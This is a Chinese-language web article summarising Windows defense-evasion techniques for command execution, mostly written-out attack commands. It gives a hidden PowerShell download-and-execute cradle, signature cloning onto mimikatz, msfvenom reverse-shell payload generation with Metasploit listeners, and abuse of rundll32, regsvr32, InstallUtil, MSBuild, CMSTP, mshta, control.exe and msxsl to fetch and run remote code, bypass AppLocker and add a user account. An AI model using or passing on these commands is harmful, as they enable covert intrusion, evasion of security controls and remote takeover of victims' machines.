Windows命令执行防御规避总结
发布时间:2023-01-24 13:20:08
今天小编为大家带来Windows命令执行防御规避总结,具体如下:
powershell
powershell.exe -nop -w hidden -c \“IEX ((new-object net.webclient).downloadstring(‘https://xx.xx.xx.xx:8888/logo.gif’))\”“ /f
SIP
通过sip劫持对恶意代码签名获得系统信任https://github.com/secretsquirrel/SigThief
python sigthief.py -i consent.exe -t mimikatz.exe -o signed-mimikatz.exe
rundll32.exe
生成
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=xx.xx.xx.xx LPORT=4444 -f dll 》xxx.dll
目标执行
rundll32.exe shell32.dll,Control_RunDLL xxx.dll
Regsvr32.exe
msfconsole
auxiliary/server/regsvr32_command_delivery_server
set CMD net user test 123456 /add
目标执行
regsvr32 /s /n /u /i:https://xx.xx.xx.xx:8080/aPxOb0o scrobj.dll
InstallUtil.exe
1.编译后门:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319》csc.exe /r:System.EnterpriseServices.dll /unsafe /target:library /out:xxx.exe /keyfile:”C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\x64\key.snk“ xxx.cs
2.靶机上运行:
InstallUtil.exe /U xxx.exe
3.msf监听,得到反弹的shell:
set payload windows/x64/meterpreter/reverse_tcp
set LHOST xx.xx.xx.xx
set LPORT 4444
exploit
Msbuild.exe
MSBuild是Microsoft Build Engine的缩写,代表Microsoft和Visual Studio的新的生成平台,MSBuild可编译特定格式的xml文件
https://github.com/3gstudent/msbuild-inline-task
msf生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=xx.xx.xx.xx lport=4444
-f csharp
使用shellcode替换https://github.com/3gstudent/msbuild-inline-task/blob/master/executes%20x64%20shellcode.xml中的shellcode部分
msf监听
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost xx.xx.xx.xx
set lport 4444
exploit
运行
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe exec64.xml
CMSTP
cmstp.exe /s /ns C:\Users\administrator\AppData\Local\Temp\XKNqbpzl.txt绕过AppLocker并启动恶意脚本
Mshta.exe
Mshta.exe 是一个执行 Microsoft HTML 应用程序 (HTA) 的实用程序,攻击者可以使用 mshta.exe 通过受信任的 Windows 实用程序代理执行恶意代码
use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) 》 set srvhost xx.xx.xx.xx
msf exploit(windows/misc/hta_server) 》 exploit
mshta.exe https://xx.xx.xx.xx:8080/xxxxxxx.hta
控制面板
攻击者可以使用控制面板项作为有效载荷来执行任意命令,控制面板项是注册的可执行文件(.exe)或控制面板(.cpl)文件,可以直接从命令行执行或通过Control_RunDLL(API)调用或者直接双击文件。
攻击者构造恶意的dll文件CPIApplet.dll
利用msf生成dll文件:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=170.170.64.17 LPORT=4444 -f dll 》 /tmp/CPIApplet.dll
传入windows机器,然后重命名为CPIApplet.cpl,通过control.exe c:\users\administrator\desktop\CPIApplet.cpl 执行命令
通过msxsl.exe调用恶意xml文件执行脚本
制作两个文件
customers.xml
script.xsl
xmlns:xsl=”https://www.w3.org/1999/XSL/Transform“
xmlns:msxsl=”urn:schemas-microsoft-com:xslt“
xmlns:user=”https://mycompany.com/mynamespace“》
function xml(nodelist) {
var r = new ActiveXObject(”WScript.Shell“).Run(”cmd.exe /k calc.exe“);
return nodelist.nextNode().xml;
}
开启http服务
python3 -m http.server 80
远程下载执行
msxsl.exe https://xx.xx.xx.xx/customers.xml https://xx.xx.xx.xx/scrip.xsl


猜你喜欢
- 我们之前了解了word的操作工作界面窗口后,我们还需要对窗口中的重要组成部分有所了解,下面分别为大家介绍word工作窗口的重要组成部分。1、
- 在Word文档中有一个查找和替换功能,使用该功能可以快速查找和替换指定内容,非常地强大,我们可以在日常办公时灵活使用该功能。比如我们可以使用
- Excel中的函数值具体该如何转换为文本呢?对于刚从其它版本转型过来的应该就不会太懂吧,没关系接,下来是小编为大家带来的excel 函数值转
- 我们需要借助于WPS空白页面为“承载”来完成WPS窗口之外的图片抓取和复杂标注任务。双击桌面上的“WPS文字”快捷方式,启动到WPS编辑页面
- 在Excel中录入好数据以后就是需要统计数据,在统计数据时经常需要用到函数计算,其中iferror也较为常用。下面是小编带来的关于excel
- 许多用户在办公的时候都需要使用ppt,而对于PPT中的一些重要文字需要转换为纯文本,那么怎么把PPT转换成纯文本的Word呢?一起来了解一下
- Win10系统怎么打开或关闭自动维护功能?有朋友们问到这个问题,下面小编就给大家带来Win10系统打开或关闭自动维护功能的方法,希望可以帮助
- 在今日凌晨,微软又正式向“Fast Ring”快速版更新用户推送了最新的Win10预览版10041。今天小编就为大家带来了win10预览版1
- Excel2003是应用很广的办公软件之一,其强大的数据统计、分析功能为我们的工作带来不少方便。那么在Excel表格中如何将多列内容合并到一
- Excel怎么筛选出小于100的数据?Excel表格中的数据很多,想要提取小于1000的数据,该怎么提取到另一列呢?下面我们就来看看exce
- Office剪贴板用于暂存Office2010中的待粘贴项目,用户可以根据需要确定在任务栏中显示或不显示Office剪贴板。在Word201
- 很多网友应该都在使用win10系统,但是,也有一些如小编一样的电脑小白不知道win10系统电脑屏幕保护程序如何设置,所以,小编特地整理了wi
- 大家在安装好系统后运行一些软件,特别是绿色软件时经常会出现msvcr120.dll丢失的情况,这是系统中缺少了软件运行必要的运行库导致的。遇
- 我们很多人都会用U盘存储文件,也有很多人将它变成U盘启动盘来帮助重装系统,但是有win7系统用户却发现将U盘启动盘插入电脑之后,却出现了无法
- Win10系统的开始菜单是这个系统的一大特色,但是有些用户的开始菜单不管是打开还是响应都非常慢,严重影响了用户体验。针对这个问题有没有什么解
- 每当过春节的时候,家家户户都会买一些春节喜庆用品来装饰家里,比如:灯笼、墙纸、对联、倒福等等。每当过春节的时候,家家户户都会买一些春节喜庆用
- C盘如果不定期清理的话,无用的文件就会越来越多,会导致电脑的运行速度变慢。但是很多用户不知道如何才能清理C盘,有些文件删除了不知道会不会影响
- Win7系统注册表被管理员禁用怎么办?对电脑有点了解的网友都该知道注册表的重要性,在电脑中注册表是对系统设置进行修改的重要工具,但是一些用户
- Acrobat中pdf文件页眉页脚怎么删除?Acrobat中想要删除pdf文件中的页眉页脚,该怎么删除呢?下面我们就来看看详细的教程,需要的
- 我们的电脑在安装升级了win101903版本之后,有的小伙伴在对系统进行更新的时候就发现了更新完系统之后关机就会出现重启蓝屏的情况。对于这种